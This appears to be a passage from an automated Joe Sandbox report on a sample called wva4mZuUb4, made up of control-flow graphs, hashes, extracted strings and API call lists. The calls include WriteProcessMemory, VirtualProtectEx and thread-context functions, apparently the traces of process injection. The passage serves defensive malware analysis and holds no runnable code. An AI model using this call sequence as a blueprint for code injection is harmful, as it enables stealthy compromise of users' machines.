                                control_flow_graph 702 1375d38-1375d3f 758 1375d41 call 1375d29 702->758 759 1375d41 call 1375d38 702->759 760 1375d41 call 1375f78 702->760 703 1375d47-1375d8b 708 1375d91-1375d99 703->708 709 1375e7e-1375eb4 703->709 708->709 710 1375d9f-1375db1 708->710 713 1375f68 709->713 756 1375db3 call 1376390 710->756 757 1375db3 call 137636f 710->757 712 1375db9-1375dc0 712->709 714 1375dc6-1375dca 712->714 718 1375ebe-1375ec1 713->718 719 1375ec9-1375ed3 713->719 716 1375e10-1375e14 714->716 717 1375dcc-1375dd0 714->717 716->709 720 1375e16-1375e1a 716->720 717->709 721 1375dd6-1375df8 717->721 722 1375ec7-1375f5a 718->722 723 1375f6d-1375f76 718->723 719->723 724 1375ed9-1375edb 719->724 725 1375e1c-1375e20 720->725 726 1375e6b-1375e7d 720->726 721->716 737 1375dfa-1375e00 721->737 755 1375f61-1375f63 722->755 724->713 725->709 728 1375e22-1375e46 725->728 743 1375e5e-1375e60 728->743 744 1375e48-1375e4e 728->744 739 1375e04-1375e06 737->739 740 1375e02 737->740 739->716 740->716 743->726 745 1375e52-1375e5c 744->745 746 1375e50 744->746 745->743 746->743 755->713 756->712 757->712 758->703 759->703 760->703
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: tPq$tPq$tPq$$q$$q$$q
                                • API String ID: 0-1383060187
                                • Opcode ID: a6aca8492a9410e227f814083583507bd43bb8678d0921a1cb871e36164f2dca
                                • Instruction ID: f976ee00271557aca3c4f68f345d88db72de8c8498af346660d3685b88ca3e6b
                                • Opcode Fuzzy Hash: a6aca8492a9410e227f814083583507bd43bb8678d0921a1cb871e36164f2dca
                                • Instruction Fuzzy Hash: CD51B330B003059FE7389B69C8047AABBE6FF89704F14C86EE11ACB665DA39DC41C791

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1368 137b838-137b87d call 137b0fc 1372 137b881-137b88d 1368->1372 1373 137b87f 1368->1373 1374 137b88f-137b8ab call 137b07c 1372->1374 1373->1374 1379 137b8af-137b8bb 1374->1379 1380 137b8ad 1374->1380 1381 137b8bd-137b904 1379->1381 1380->1381 1387 137b906-137b91d call 137ba58 1381->1387 1388 137b955 1381->1388 1390 137b923-137b927 1387->1390 1389 137b95a-137b95e 1388->1389 1391 137b975 1389->1391 1392 137b960-137b96d 1389->1392 1390->1388 1393 137b929-137b92d 1390->1393 1397 137b976 1391->1397 1392->1391 1394 137b940-137b953 1393->1394 1395 137b92f-137b933 1393->1395 1394->1389 1395->1388 1398 137b935-137b93d 1395->1398 1397->1397 1398->1394
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: PHq$Teq$Teq$Teq$Teq
                                • API String ID: 0-4172515056
                                • Opcode ID: 4c72ba73fad40f988ceb2e23d38711c60246a96c79e93f8e0609186e08df57ad
                                • Instruction ID: a4155b241ceabc8c20b5dfa013bd65f9d396f3c5b53d374c08ec1d923767378c
                                • Opcode Fuzzy Hash: 4c72ba73fad40f988ceb2e23d38711c60246a96c79e93f8e0609186e08df57ad
                                • Instruction Fuzzy Hash: 6B318030E00209DFEB349F69C4557AEBAF2BF89714F24842DE466A7388CB794C41CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1401 14ecb09-14ecba7 GetCurrentProcess 1406 14ecba9-14ecbaf 1401->1406 1407 14ecbb0-14ecbe4 GetCurrentThread 1401->1407 1406->1407 1408 14ecbed-14ecc21 GetCurrentProcess 1407->1408 1409 14ecbe6-14ecbec 1407->1409 1410 14ecc2a-14ecc45 call 14ecce8 1408->1410 1411 14ecc23-14ecc29 1408->1411 1409->1408 1415 14ecc4b-14ecc7a GetCurrentThreadId 1410->1415 1411->1410 1416 14ecc7c-14ecc82 1415->1416 1417 14ecc83-14ecce5 1415->1417 1416->1417
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 014ECB96
                                • GetCurrentThread.KERNEL32 ref: 014ECBD3
                                • GetCurrentProcess.KERNEL32 ref: 014ECC10
                                • GetCurrentThreadId.KERNEL32 ref: 014ECC69
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 1b877dd3a88c9490336d899d36b377571ab48fed2f8415999b07e7d4700c7ef8
                                • Instruction ID: 8402c8be28bc88caea181b63bc3046c5aa5d6ca4c45a8de0d637dacb187bea6f
                                • Opcode Fuzzy Hash: 1b877dd3a88c9490336d899d36b377571ab48fed2f8415999b07e7d4700c7ef8
                                • Instruction Fuzzy Hash: 935146B1D00609CFEB18DFAAD588BDEBBF1EB48314F24806AE409A7361D7346945CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1424 14ecb18-14ecba7 GetCurrentProcess 1428 14ecba9-14ecbaf 1424->1428 1429 14ecbb0-14ecbe4 GetCurrentThread 1424->1429 1428->1429 1430 14ecbed-14ecc21 GetCurrentProcess 1429->1430 1431 14ecbe6-14ecbec 1429->1431 1432 14ecc2a-14ecc45 call 14ecce8 1430->1432 1433 14ecc23-14ecc29 1430->1433 1431->1430 1437 14ecc4b-14ecc7a GetCurrentThreadId 1432->1437 1433->1432 1438 14ecc7c-14ecc82 1437->1438 1439 14ecc83-14ecce5 1437->1439 1438->1439
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 014ECB96
                                • GetCurrentThread.KERNEL32 ref: 014ECBD3
                                • GetCurrentProcess.KERNEL32 ref: 014ECC10
                                • GetCurrentThreadId.KERNEL32 ref: 014ECC69
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: f4ffa39e8f1bc5b9932e37091766b0297d916edd288068ca062eaa203da686ba
                                • Instruction ID: 9ae42a25e3a0591c0e395d6c237f27aa6a9adcb762394dc339430beee7618c6b
                                • Opcode Fuzzy Hash: f4ffa39e8f1bc5b9932e37091766b0297d916edd288068ca062eaa203da686ba
                                • Instruction Fuzzy Hash: 725145B0D00609CFEB58CFAAD588BDEBBF1EF48304F20846AE009AB360D7345944CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3545 137bdd0-137bded 3546 137bdef-137bdf4 3545->3546 3547 137bdf9-137be05 3545->3547 3548 137c18e-137c193 3546->3548 3550 137be07-137be09 3547->3550 3551 137be15-137be1a 3547->3551 3552 137be11-137be13 3550->3552 3551->3548 3552->3551 3553 137be1f-137be2b 3552->3553 3555 137be2d-137be39 3553->3555 3556 137be3b-137be40 3553->3556 3555->3556 3558 137be45-137be50 3555->3558 3556->3548 3560 137be56-137be61 3558->3560 3561 137befa-137bf05 3558->3561 3564 137be77 3560->3564 3565 137be63-137be75 3560->3565 3566 137bf0b-137bf1a 3561->3566 3567 137bfa8-137bfb4 3561->3567 3568 137be7c-137be7e 3564->3568 3565->3568 3576 137bf1c-137bf26 3566->3576 3577 137bf2b-137bf3a 3566->3577 3574 137bfb6-137bfc2 3567->3574 3575 137bfc4-137bfd6 3567->3575 3570 137be80-137be8f 3568->3570 3571 137be9e-137bea3 3568->3571 3570->3571 3581 137be91-137be9c 3570->3581 3571->3548 3574->3575 3586 137c004-137c00f 3574->3586 3589 137bffa-137bfff 3575->3589 3590 137bfd8-137bfe4 3575->3590 3576->3548 3584 137bf5e-137bf67 3577->3584 3585 137bf3c-137bf48 3577->3585 3581->3571 3593 137bea8-137beb1 3581->3593 3599 137bf7d 3584->3599 3600 137bf69-137bf7b 3584->3600 3595 137bf54-137bf59 3585->3595 3596 137bf4a-137bf4f 3585->3596 3597 137c015-137c01e 3586->3597 3598 137c0f1-137c0fc 3586->3598 3589->3548 3606 137bfe6-137bfeb 3590->3606 3607 137bff0-137bff5 3590->3607 3609 137beb3-137beb8 3593->3609 3610 137bebd-137becc 3593->3610 3595->3548 3596->3548 3614 137c034 3597->3614 3615 137c020-137c032 3597->3615 3612 137c126-137c135 3598->3612 3613 137c0fe-137c108 3598->3613 3601 137bf82-137bf84 3599->3601 3600->3601 3601->3567 3604 137bf86-137bf92 3601->3604 3624 137bf94-137bf99 3604->3624 3625 137bf9e-137bfa3 3604->3625 3606->3548 3607->3548 3609->3548 3620 137bef0-137bef5 3610->3620 3621 137bece-137beda 3610->3621 3628 137c137-137c146 3612->3628 3629 137c189 3612->3629 3631 137c11f-137c124 3613->3631 3632 137c10a-137c116 3613->3632 3617 137c039-137c03b 3614->3617 3615->3617 3622 137c03d-137c049 3617->3622 3623 137c04b 3617->3623 3620->3548 3638 137bee6-137beeb 3621->3638 3639 137bedc-137bee1 3621->3639 3630 137c050-137c052 3622->3630 3623->3630 3624->3548 3625->3548 3628->3629 3641 137c148-137c160 3628->3641 3629->3548 3635 137c054-137c059 3630->3635 3636 137c05e-137c071 3630->3636 3631->3548 3632->3631 3643 137c118-137c11d 3632->3643 3635->3548 3644 137c073 3636->3644 3645 137c0a9-137c0b3 3636->3645 3638->3548 3639->3548 3656 137c182-137c187 3641->3656 3657 137c162-137c180 3641->3657 3643->3548 3647 137c076-137c087 call 137a5f0 3644->3647 3651 137c0b5-137c0c1 call 137a5f0 3645->3651 3652 137c0d2-137c0de 3645->3652 3654 137c08e-137c093 3647->3654 3655 137c089-137c08c 3647->3655 3665 137c0c3-137c0c6 3651->3665 3666 137c0c8-137c0cd 3651->3666 3667 137c0e7 3652->3667 3668 137c0e0-137c0e5 3652->3668 3654->3548 3655->3654 3659 137c098-137c09b 3655->3659 3656->3548 3657->3548 3662 137c194-137c1bc 3659->3662 3663 137c0a1-137c0a7 3659->3663 3674 137c1be-137c1c3 3662->3674 3675 137c1c8-137c1d3 3662->3675 3663->3645 3663->3647 3665->3652 3665->3666 3666->3548 3669 137c0ec 3667->3669 3668->3669 3669->3548 3676 137c349-137c34d 3674->3676 3678 137c27b-137c284 3675->3678 3679 137c1d9-137c1e4 3675->3679 3682 137c286-137c291 3678->3682 3683 137c2cf-137c2da 3678->3683 3684 137c1e6-137c1f8 3679->3684 3685 137c1fa 3679->3685 3694 137c347 3682->3694 3695 137c297-137c2a9 3682->3695 3692 137c2f0 3683->3692 3693 137c2dc-137c2ee 3683->3693 3686 137c1ff-137c201 3684->3686 3685->3686 3688 137c236-137c248 3686->3688 3689 137c203-137c212 3686->3689 3688->3694 3703 137c24e-137c25c 3688->3703 3689->3688 3699 137c214-137c22a 3689->3699 3697 137c2f5-137c2f7 3692->3697 3693->3697 3694->3676 3695->3694 3704 137c2af-137c2b3 3695->3704 3697->3694 3701 137c2f9-137c308 3697->3701 3699->3688 3724 137c22c-137c231 3699->3724 3714 137c330 3701->3714 3715 137c30a-137c313 3701->3715 3712 137c25e-137c263 3703->3712 3713 137c268-137c26b 3703->3713 3705 137c2b5-137c2ba 3704->3705 3706 137c2bf-137c2c2 3704->3706 3705->3676 3710 137c34e-137c37e 3706->3710 3711 137c2c8-137c2cb 3706->3711 3711->3704 3716 137c2cd 3711->3716 3712->3676 3713->3710 3717 137c271-137c274 3713->3717 3718 137c335-137c337 3714->3718 3725 137c315-137c327 3715->3725 3726 137c329 3715->3726 3716->3694 3717->3703 3722 137c276 3717->3722 3718->3694 3723 137c339-137c345 3718->3723 3722->3694 3723->3676 3724->3676 3728 137c32e 3725->3728 3726->3728 3728->3718
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'q$4'q$4'q$;q
                                • API String ID: 0-3883815979
                                • Opcode ID: e1c0cea537a1dcbb1174088aa9190751c08799e21497884e5b57cf0531876978
                                • Instruction ID: 1517f19ce688c9e9c42bf7aa51068a913c22295488665245b5e8c5e40eea5aa2
                                • Opcode Fuzzy Hash: e1c0cea537a1dcbb1174088aa9190751c08799e21497884e5b57cf0531876978
                                • Instruction Fuzzy Hash: 59F182303082068FEB359A3DD85473D7BEAAF85618F1850BAE606CF7A6DA2DCC41D751
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: tPq$tPq$$q$$q
                                • API String ID: 0-3679180566
                                • Opcode ID: e62347d6191ab7447091e4352bb63d4cd958463978511bddebfdf248a4fa8eaa
                                • Instruction ID: 4311b2a92159015d311ac91e256e1e7fdd62752b4e3d2a81a25d746e4f73bb19
                                • Opcode Fuzzy Hash: e62347d6191ab7447091e4352bb63d4cd958463978511bddebfdf248a4fa8eaa
                                • Instruction Fuzzy Hash: FF31E830B003059FE7395B7988047ABBAE3BB85704F18CC2ED0598BB95CB7A9C41C792
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: (oq$$q$$q
                                • API String ID: 0-553014825
                                • Opcode ID: 6c0bbdd2d0fe8c5f2419b9fdad20ab3d4c278c407b482c070a4a03dfc7843c7a
                                • Instruction ID: e8c1644bf31bccc3b8f6782839cbc2c7d3f23e4721989800fcfcce6df11c41e5
                                • Opcode Fuzzy Hash: 6c0bbdd2d0fe8c5f2419b9fdad20ab3d4c278c407b482c070a4a03dfc7843c7a
                                • Instruction Fuzzy Hash: CE722274A002198FEB299BA4C854BAEBB73FF84300F1081AED14A6B3A5DF355D85DF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'q$4'q
                                • API String ID: 0-1467158625
                                • Opcode ID: 0b8ebc4c724f6aee5aaa95961d597148e7c1a34da3b788a1a0d4956c76d67afd
                                • Instruction ID: 480c29b129559707c8b369bf352c4f4ae2973d143066672d8762fb5fe726e3ac
                                • Opcode Fuzzy Hash: 0b8ebc4c724f6aee5aaa95961d597148e7c1a34da3b788a1a0d4956c76d67afd
                                • Instruction Fuzzy Hash: DBD1C6306003069FDB21CF6CD8846AABBB6FF85314F148566E959DB362D735EC12CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 03[$Teq
                                • API String ID: 0-1606496134
                                • Opcode ID: c02820ea434f170db4d3d8d5182eb9f5449fb5e054f3f9526737b17006274402
                                • Instruction ID: 5d83e3b820046ed1166cc440534390ede9dcbcf369948e17631ca1abca5c33fc
                                • Opcode Fuzzy Hash: c02820ea434f170db4d3d8d5182eb9f5449fb5e054f3f9526737b17006274402
                                • Instruction Fuzzy Hash: 8C511834A10218DFD714DF69D898EAEBBF2FF48714F258069E506AB3A5CB75AC01CB40
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$Teq
                                • API String ID: 0-2281163723
                                • Opcode ID: 699cc1e05a951fd405ec280b27537735b7116d9cff58636ea75736ed32045910
                                • Instruction ID: 3b3732eff1ff8a440e9fff372ea5afe01dffe75b0671eb4b712a57341480f17c
                                • Opcode Fuzzy Hash: 699cc1e05a951fd405ec280b27537735b7116d9cff58636ea75736ed32045910
                                • Instruction Fuzzy Hash: D841879160E3D14FE3035B3858243997FB1AF87154B1E02DBD192CF6E3D9198C0A83A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: Teq
                                • API String ID: 0-1098410595
                                • Opcode ID: 29fc1a4bed47569358c88440d2d5274aa1be0109bbd31593a814c3e8e2037b68
                                • Instruction ID: 74d2dfd1ebcc119876f3c3c017c14bdc134785abe8e633cbd091540f0524e76a
                                • Opcode Fuzzy Hash: 29fc1a4bed47569358c88440d2d5274aa1be0109bbd31593a814c3e8e2037b68
                                • Instruction Fuzzy Hash: 97528F30F043148FDB48BB79E99535DBBB6AF84340F9085A9D449A37A4DF389C58CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: (oq
                                • API String ID: 0-1999159160
                                • Opcode ID: d74849aa7896e5f5b863744e44e9f350eb2c29848ad825f31aa3ebb9b9d4c4c4
                                • Instruction ID: 31d67290735ebcca188693a140c97c914f98ebe6637bfb7d46542aafbb0ae3f3
                                • Opcode Fuzzy Hash: d74849aa7896e5f5b863744e44e9f350eb2c29848ad825f31aa3ebb9b9d4c4c4
                                • Instruction Fuzzy Hash: 23124D71600119DFCB25CF68C584BAEBBB2FF8832CF198659E406DB295C739E881CB55
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 014EAAE6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 35b76be6fd7ce0219c08e8e67f1f6e245530058fe378a48dc291d2b0534955ec
                                • Instruction ID: fdde246fb2a1969178662e7572c1ab975225aaf9085352e1b86e99b65c5fc065
                                • Opcode Fuzzy Hash: 35b76be6fd7ce0219c08e8e67f1f6e245530058fe378a48dc291d2b0534955ec
                                • Instruction Fuzzy Hash: EB712870A00B058FEB24DF6AD54475BBBF1BF88205F208A2ED48AD7B60D775E845CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: G
                                • API String ID: 0-985283518
                                • Opcode ID: 66b651ee6083d918c0d7a81d0d46178e398bb44f4578e165054d9c832e3266af
                                • Instruction ID: 2a0d99c7ef97e6047b4e54618f6f006be35608b33ba9da60270139892dbde564
                                • Opcode Fuzzy Hash: 66b651ee6083d918c0d7a81d0d46178e398bb44f4578e165054d9c832e3266af
                                • Instruction Fuzzy Hash: ACE1BF70700209DFDB259F69D858B7E7BA6BBC8328F148429E506CB395DB78CC41CB91
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0780BEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: f28ffdf2b1e9b90f471e31f6a83080d4b49a878994708ada6f067743311b5dd4
                                • Instruction ID: a685df035898e2152faec2c33c58f92fc8328e8a15d4e5c4e4b43d37678bfadf
                                • Opcode Fuzzy Hash: f28ffdf2b1e9b90f471e31f6a83080d4b49a878994708ada6f067743311b5dd4
                                • Instruction Fuzzy Hash: DD41B0B68083CA8FD7018F69D8117CAFFF0AB1A226F24824AD4949B3D2D3395551CBE5
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F0E6D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 8d4a53d20b89ea9a0c2bb01941c979b61c0b550843190f97881fd96cb8646bea
                                • Instruction ID: 02bb9f8929d4f8f0fb3410c974b6c75134c25eca03553da34b42b5aab420d5c0
                                • Opcode Fuzzy Hash: 8d4a53d20b89ea9a0c2bb01941c979b61c0b550843190f97881fd96cb8646bea
                                • Instruction Fuzzy Hash: 20214671D003499FDB10CFA9C880BDEBBF5FF48310F10882AE918A7240D779A940DBA4
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014ECDE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: f83d2a96caa26a5b8512de67097a65b19fda94af069ce6a59c89ef35a49e196e
                                • Instruction ID: b42b9a68506baaeb981bedee36484ff2a7f74098858d28fa099e616854e718b4
                                • Opcode Fuzzy Hash: f83d2a96caa26a5b8512de67097a65b19fda94af069ce6a59c89ef35a49e196e
                                • Instruction Fuzzy Hash: 4721D2B5900248EFDB10CF9AD884ADEBFF4EB48220F14801AE918A7350C379A945CFA5
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F0F0AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 890f000a38cb90e9ecbb6c7b6ecd075cec4891a92b8cb691a224dd08087b31dd
                                • Instruction ID: 07d83e12a012f64a43c1cb167759c6e1d7f0a6271e1ed68d7fd6bf8853fac79e
                                • Opcode Fuzzy Hash: 890f000a38cb90e9ecbb6c7b6ecd075cec4891a92b8cb691a224dd08087b31dd
                                • Instruction Fuzzy Hash: AC212571D003088FDB24DFAAC4857EEBBF4EB48314F14842ED559A7280CB799945CFA5
                                APIs
                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 08F0D896
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: c40d343e939f432e8f6555843484c69f3bce8b815f66026e7f633f83d8f256e0
                                • Instruction ID: ac3cb359c1fd849c348c5ec1231bb89ddba5c7ea4fefa96c04fd2192d9b4b2d8
                                • Opcode Fuzzy Hash: c40d343e939f432e8f6555843484c69f3bce8b815f66026e7f633f83d8f256e0
                                • Instruction Fuzzy Hash: 5B2134B1D003098FDB14DFAAC485BEEBBF4EB48314F24842ED559A7280CB789945DFA5
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014ECDE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 4a135ee607ebc9e6dad6b30052d18451234cc68582b393bec3d38d3d3f37b7e2
                                • Instruction ID: 203e511387281211068f27555fd02844c958c84eb5495885e26b52019fdd6d78
                                • Opcode Fuzzy Hash: 4a135ee607ebc9e6dad6b30052d18451234cc68582b393bec3d38d3d3f37b7e2
                                • Instruction Fuzzy Hash: B221E3B5D00248DFDB10CF9AD884ADEBFF4EB48310F14801AE918A7350C379A944CFA5
                                APIs
                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 08F0EE07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 4d61467944e7b6396ced0583869539ae1e28efd07f4c156b290e8d6cf58bce10
                                • Instruction ID: 4651f76f7e402ca8f0c3db6195e8a15c12c11881dbba3369dc3b1d58fd1f1b6e
                                • Opcode Fuzzy Hash: 4d61467944e7b6396ced0583869539ae1e28efd07f4c156b290e8d6cf58bce10
                                • Instruction Fuzzy Hash: 04212371C002499FDB10DFAAC844BEEBBF5EF48220F10842AE519A7241CB799941DFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08F04ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 06c3794263f95f9153d6e111968a6041ef0a67eec69dcb6ce3bd40853660600e
                                • Instruction ID: 1bc93ec5aa461ff89fbf76859fb1a439cc44a35de0c7cf4cc5860c160c33b1c8
                                • Opcode Fuzzy Hash: 06c3794263f95f9153d6e111968a6041ef0a67eec69dcb6ce3bd40853660600e
                                • Instruction Fuzzy Hash: AD2108B5D00249DFDB10CF9AC584BDEBBF4EB48314F108029E558A7651C3789545CFA9
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 0627C668
                                Memory Dump Source
                                • Source File: 00000000.00000002.1923700244.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6270000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: f98c41b17fb6a5e38acbcec1fafb8948a84a4241300b9f23cb697a0280545c13
                                • Instruction ID: 463973b79aab73fb4dbf1d979416641120e4ad50c9ea7c8d1d6d4259644ff4dd
                                • Opcode Fuzzy Hash: f98c41b17fb6a5e38acbcec1fafb8948a84a4241300b9f23cb697a0280545c13
                                • Instruction Fuzzy Hash: 641138B5C0065A9FDB14CFAAC444BEEFBF4EB48310F10812AD818B7240D738AA45CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0780BEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 9101978855446bab43cf9d94f29d924cfca754bfbbbc0937bc5e1f974c2ea4a0
                                • Instruction ID: a772d8c5bf645764d824462b88031a9fc6a8372028f17696834bd4dad83e5ce8
                                • Opcode Fuzzy Hash: 9101978855446bab43cf9d94f29d924cfca754bfbbbc0937bc5e1f974c2ea4a0
